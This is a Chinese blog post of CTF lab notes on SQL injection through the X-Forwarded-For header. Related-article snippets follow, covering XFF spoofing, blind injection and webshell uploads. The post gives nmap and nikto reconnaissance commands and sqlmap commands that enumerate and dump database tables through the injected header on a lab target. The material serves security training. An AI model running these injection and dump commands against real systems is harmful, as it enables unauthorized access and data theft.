CTF训练 web安全SQl注入(X-Forwarded-For报文头)

最新推荐文章于 2024-01-07 23:08:56 发布
最新推荐文章于 2024-01-07 23:08:56 发布
阅读量527 收藏
点赞数 1
分类专栏: 网络攻防 学习笔记 文章标签: 网络安全 CTF SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62617719/article/details/127352582
版权

任何一个位置都可能是注入点

SQL注入漏洞简介

SQl注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQl语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。

任何一个用户可以输入的位置都可能是注入点,比如url中,以及http报文中。

实验

(一)实验环境

  • 攻击机kail linux:192.168.1.104

  • 靶场机器:192.168.1.105

  • 目的:挖掘web漏洞,登录系统

(二)信息探测

  • 扫描主机服务信息以及服务版本
    – nmap -sV 靶场IP地址

  • 快速扫描主机全部信息
    – nmap -T4 -A -v 靶场IP地址

  • 探测敏感信息
    – nikto -host http://靶场IP地址:端口

(三)漏洞扫描

  • 漏洞扫描器 AVWS

  • 功能强大专注于web安全的漏洞扫描器。

(四)漏洞利用

针对web进行漏洞扫描

对扫描的结果进行分析,注意:如果具有SQL注入漏洞,可以直接利用,SQl注入漏洞为高危漏洞,可以直接获取服务器的权限。

使用sqlmap利用SQL注入漏洞

– sqlmap -u url -dbs 查看数据库名 --batch
– sqlmap -u url -headers=“X-Forwarded-For:" -D “数据库名” -table 查看对应数据库中的数据表 --batch
– sqlmap -u url -headers="X-Forwarded-For:” -D “数据库名” -T “表名” -columns 查看对应字段 --batch
– sqlmap -u url -headers=“X-Forwarded-For:*” -D “数据库名” -T “表名” -C “列名” -dump --batch

总结

只要是用户可以输入的位置都是有可能存在注入点的!

梁辰兴
关注
专栏目录
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
bugkuctf web基础部分 writeup
river
03-20 2906
Bugku-ctf-web 管理员系统 随便输入用户名和密码提示 窗体顶端 窗体底端 IP禁止访问,请联系本地管理员登陆,IP已被记录. 明显需要伪造允许登录的IP 知识点: XFF(X-Forwarded-For),代表客户端,也就是HTTP的请求端真实的IP。有两种方式可以从HTTP请求中获得请求者的IP地址。一个是从Remote Address中获得,另一个是从X-Forward-For中...
CTF之路:关于X-Forwarded-For注入
zw05011的博客
01-05 3097
题目 输入任意用户名密码登录,显示IP禁止访问。 知识点 伪造XFF绕过服务器IP过滤 IP伪造 TCP/IP层面的IP伪造很难实现,因为更改后很难实现正常的TCP通信,但在HTTP层面的伪造就显得很容易。可以通过伪造XFF进行IP伪造 XFF字段 X-Forwarded-For(XFF)简称XFF,是HTTP 报文部的关键字段之一。代表了HTTP的请求端真实的IP。它被认为是客户端通过HTTP代理或者负载均衡器连接到web服务端获取源ip地址的一个标准(通常一些网站的防注入..
CTF-sql注入(X-Forwarded-For)
Reaches_r的博客
08-05 288
1.扫描目标IP发现只开了80http服务 2.进去有个登录界面,考虑sql注入得到账户密码 3.启动AWVS(AcunetixWeb Vulnarability Scanner)添加目标,扫描发现存在X-Forwarded-For注入漏洞 4.使用sqlmap注入攻击(--batch表示自动回应询问) (1)得到数据库名 (2)同理得到表名、列名,暴力破解出账户密码 5.登录后台,上传webshell,控制目标,具体步骤参考前面的文章。 ...
CTF-sql注入(X-Forwarded-For)
不知名白帽的博客
05-24 394
CTF-sql注入(X-Forwarded-For),实验环境:kali(192.168.20.128),靶机(192.168.20.132)。先进行信息探测,再用AWVS进行漏洞扫描,完后通过sqlmap利用漏洞,查看账户和密码
X-Forwarded-For 在 CTF 中的使用
最新发布
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-07 1117
ip 末尾的 .0.1 要改成变量,当然了,不一定是 10.1.0.1,其他地址也可以,目的是改变 ip 地址实现无限投票。猜测是用户密码,由于是管理员,我们猜测用户为 admin,登录后提示用本地管理员登录。网页提示从本地访问,那就要用到 XFF 了,打开 burp,打开代理,访问网站抓包。下面就举个刷赞的例子。
CTF-HTTP注入漏洞测试(X-Forwarded-for)
asd158923328的博客
08-21 2273
根据题意 X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求字段。 进入环境,打开跳转页 打开Burp Suite ,抓包,右键发送给repeater,填入X-Forwarded-For,首先判断是否可注入。 order by 判断表数量,从1开始依次试试,最后发现是4 union select 1,2...
CTF-WEB小技俩
热门推荐
giantbranch的专栏
09-02 1万+
CTF-WEB小技俩 实验来源:合天网安实验室 预备知识       HTTP协议,报文的组成部分等,请参考http://raytaylorlin.com/Tech/web/HTTP/HTTP-message/以及简单的js脚本编写能力。
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1224
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
关于CTF学习总结
m0_37496212的博客
02-26 2900
# -*-coding:utf-8-*- import requests import time payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.{}-' #不区分大小写的 flag = "" print("Start") for i in range(33): for payload in payloads: s
ctf训练 web安全SQL注入(X-Forwarded-For)
qq_43799246的博客
12-02 586
ctf训练 web安全SQL注入(X-Forwarded-For) SQL注入漏洞介绍 SQL注入攻击指用用户构建特殊的输入作为参数传入Web应用程序,通过执行sQ语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中; 实验环境 一台kail攻击机 和 靶机 靶机镜像:https://pan.baidu.com/s/1juB-vkfP9C7RHEM5T4ffAA 提取码:dquy 安
CTF实验:X-Forwarded-For注入
floyd_art的博客
04-01 1571
SQL注入漏洞介绍 SQL注入攻击指用用户构建特殊的输入作为参数传入Web应用程序,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中; 信息探测 扫描主机服务信息以及服务版本 – nmap -sV 靶场IP地址 快速扫描主机全部信息 – nmap -T4 ...
ctf web练习之SQL注入
weixin_51614848的博客
04-19 638
1.首先看题目像SQL注入,于是用burpsuit抓包。针对数据库web2(与题目名字一致)再爆表名,使用指令。备注:本文仅供自用,如有错误,欢迎指出。得到列名,再对列进行爆破,使用指令。把以上所有内容复制到1.txt中。2.使用sqlmap,使用指令。
CTF-sql注入(X-Forwarded-For)【简单易懂】
墨鱼菜鸡
09-10 220
目录 环境配置 信息探测 AWVS漏洞扫描 漏洞利用 扫描数据库 扫描表名 扫描字段值 扫描用户名和密码 环境配置 kali 192.168.20.128 靶机 192.168.20.132 链接:https://pan.baidu.com/s/1vUYqkBnWkrfXvdC99nOsSQ 提取码:4p7w 信息探测 ...
CTF】X-Forwarded-For SQL注入实战
HAPPY
07-30 4658
1.首先burp抓包,分析post包,保存为txt文件 (可看这个 https://blog.csdn.net/u014549283/article/details/81290015 ,此处用 -r 参数) 2、使用sqlmap进行注入 爆数据库 sqlmap -r xxx.txt --dbs --batch   爆表名 sqlmap -r xxx.txt -D 数据库名 --tab...
CG-CTF-Web-SQL注入1
1stPeak's Blog
07-10 994
SQL注入1 1.题目 2.我们查看一下题目 3.我们查看一下Source,看看有什么收获 好的,我们接下来分析代码 <html> <head> Secure Web Login </head> <body> <?php if($_POST[user] && $_POST[pass]) { mysql_conne...
CTF-web题之简单的SQL注入
qq_25046827的博客
11-24 5230
这两天闲着没事报名了学校信安和网安组织的网络安全大赛,靠着仅有的一点web知识做了几道web题,现在记录一下其中一道sql注入题的解题思路 首先题面如下 首先通过语句判断有多少个字段: 1' or 1=1 order by 4 # 1' or 1=1 order by 3 # order by是按by后面的数字或字段名所在列进行排序,如果结果集只有3列,order by4则会报错,故可以用来判断结果集的字段数 第一条语句报错,第二条语句返回 admin 5ef582761f2cafceebdfc8c
CTF练习:SQL注入之X-Forwarded-For报
qq_43233085的博客
11-28 999
CTF练习:SQL注入之get参数注入环境准备信息收集漏洞挖掘sqlmap注入上传shell脚本(copy)拿到靶机shell(copy) 靶机地址: 链接: https://pan.baidu.com/s/1u-br8L4Lk4X7EGS7kROhMQ 提取码: 2fmj 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172....
CTFweb篇-SQL注入(二)
weixin_44597701的博客
08-15 287
盲注 基于布尔的盲注 基于布尔的盲注,就是传入注入的值,服务器那边只是返回True或者False SQL语句一点注意点 如果原句是select * from table where id = ‘x’ 这里x可以是1",1")等,大概原理跟上一篇的"x"情形一样,但是这里不能是 x’ Less8 传入 http://127.0.0.1/sqli-labs-master/Less-8/?id=1 正常显示 传入id=1",id=1"),id=1’也是正常显示 但是当传入id=1’时 ...
利用X-Forwarded-For注入:时间盲注与SQL技巧
在这个Bugku Web题目的INSERT INTO注入挑战中,参与者需要利用一个HTTP(X-Forwarded-For)中的IP地址进行SQL注入攻击。题目提供了一个PHP脚本,该脚本首先获取用户的IP地址,然后将其插入到`client_ip`表中的`ip`...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

梁辰兴

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值